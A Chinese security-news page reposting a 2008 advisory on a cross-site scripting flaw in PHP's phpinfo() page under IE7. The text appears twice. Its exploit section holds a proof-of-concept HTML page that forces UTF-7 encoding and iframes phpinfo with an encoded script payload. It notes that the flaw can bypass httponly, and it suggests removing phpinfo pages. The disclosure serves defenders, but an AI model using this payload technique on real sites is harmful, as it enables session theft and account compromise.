phpinfo跨站腳本漏洞
互聯(lián)網 發(fā)布時間:2008-10-08 20:02:06 作者:佚名
我要評論

漏洞說明:
php是一款被廣泛使用的編程語言,可以被嵌套在html里用做web程序開發(fā)。phpinfo()是用來顯示當前php環(huán)境的一個函數(shù),許多站點和程序都會將phpinfo放在自己的站點上或者在程序里顯示,但是phpinfo里存在一些安全問題,導致精心構造數(shù)據(jù)就可以產生一個跨站腳
漏洞說明:
php是一款被廣泛使用的編程語言,可以被嵌套在html里用做web程序開發(fā)。phpinfo()是用來顯示當前php環(huán)境的一個函數(shù),許多站點和程序都會將phpinfo放在自己的站點上或者在程序里顯示,但是phpinfo里存在一些安全問題,導致精心構造數(shù)據(jù)就可以產生一個跨站腳本漏洞,可以被用來進行攻擊。
漏洞成因: phpinfo頁面對輸入的參數(shù)都做了詳細的過濾,但是沒有對輸出的進行charset的指定,而在一些瀏覽器里如IE7里,你可以讓它自動選擇編碼或者通過一個iframe頁面給它指定編碼,這樣就可以饒過phpinfo的過濾而產生一個跨站腳本漏洞。
漏洞來源: http://www.80sec.com/release/phpinfo-xss.txt
漏洞利用: 利用代碼如下:
<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1">
以上代碼在IE7 php 5.2.6測試成功。phpinfo頁面的xss甚至比其他頁面更加危險,因為如果有phpinfo的存在,惡意攻擊者可以利用phpinfo的輸出bypass如httponly和一些基礎認證。
漏洞影響: 影響所有版本的php和瀏覽器IE7
漏洞修補: 建議暫時刪除站點的phpinfo頁面避免被人利用。
php是一款被廣泛使用的編程語言,可以被嵌套在html里用做web程序開發(fā)。phpinfo()是用來顯示當前php環(huán)境的一個函數(shù),許多站點和程序都會將phpinfo放在自己的站點上或者在程序里顯示,但是phpinfo里存在一些安全問題,導致精心構造數(shù)據(jù)就可以產生一個跨站腳本漏洞,可以被用來進行攻擊。
漏洞成因: phpinfo頁面對輸入的參數(shù)都做了詳細的過濾,但是沒有對輸出的進行charset的指定,而在一些瀏覽器里如IE7里,你可以讓它自動選擇編碼或者通過一個iframe頁面給它指定編碼,這樣就可以饒過phpinfo的過濾而產生一個跨站腳本漏洞。
漏洞來源: http://www.80sec.com/release/phpinfo-xss.txt
漏洞利用: 利用代碼如下:
<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1">
以上代碼在IE7 php 5.2.6測試成功。phpinfo頁面的xss甚至比其他頁面更加危險,因為如果有phpinfo的存在,惡意攻擊者可以利用phpinfo的輸出bypass如httponly和一些基礎認證。
漏洞影響: 影響所有版本的php和瀏覽器IE7
漏洞修補: 建議暫時刪除站點的phpinfo頁面避免被人利用。
相關文章
- 偶爾在網上看到這些,拿來和大家一塊看看,也好讓各個站長懂得保護自己的網站2012-10-16
- 安全狗是一款大家熟悉的服務器安全加固產品,據(jù)稱已經擁有50W的用戶量。最近經過一些研究,發(fā)現(xiàn)安全狗的一些防護功能,例如SQL注入、文件上傳、防webshell等都可以被繞過2014-07-17
中國移動mas2.0平臺系統(tǒng)漏洞暴光 附修復方法
MAS是中國移動的短信代理網關(平臺)。MAS是Mobile Agent Server的簡稱。目前多個政府部門、國有大型企業(yè)部門、運營商、金融部門都采用該平臺。MAS2.0是中國新一代的代理2012-05-11查找Centos Linux服務器上入侵者的WebShell后門
服務器被掛馬或被黑的朋友應該知道,黑客入侵web服務器的第一目標是往服務器上上傳一個webshell,有了webshell黑客就可以干更多的事 情2012-07-10- PHP網頁的安全性問題,針對PHP的網站主要存在下面幾種攻擊方式2011-03-11
- 我們的服務器又出入侵事故了。有客戶的html 網頁底部被插入了一段js 腳本, 導致訪客打開網頁時被殺毒軟件警告網站上有惡意代碼2012-07-10
- 新 win2003 IIS6 解析漏洞,大家可以參考下,注意防范。2009-11-23
- 今天訪問公司的一個網站,突然發(fā)現(xiàn)網頁顯示不對,右鍵查看HTML代碼,發(fā)現(xiàn)iframe了一個網站的js文件,不用說,肯定被掛馬了2014-07-31
- 本文介紹了使用CSRF漏洞攻擊D-link路由器全過程,主要目的是如何通過CSRF漏洞實現(xiàn)遠程管理訪問D-link路由器,需要的朋友可以參考下2014-04-25
- 大部分的用戶可能不要了解文件上傳漏洞,下面小編就為大家具體的講解什么事文件上傳漏洞以及文件上傳漏洞的幾種方式2016-11-02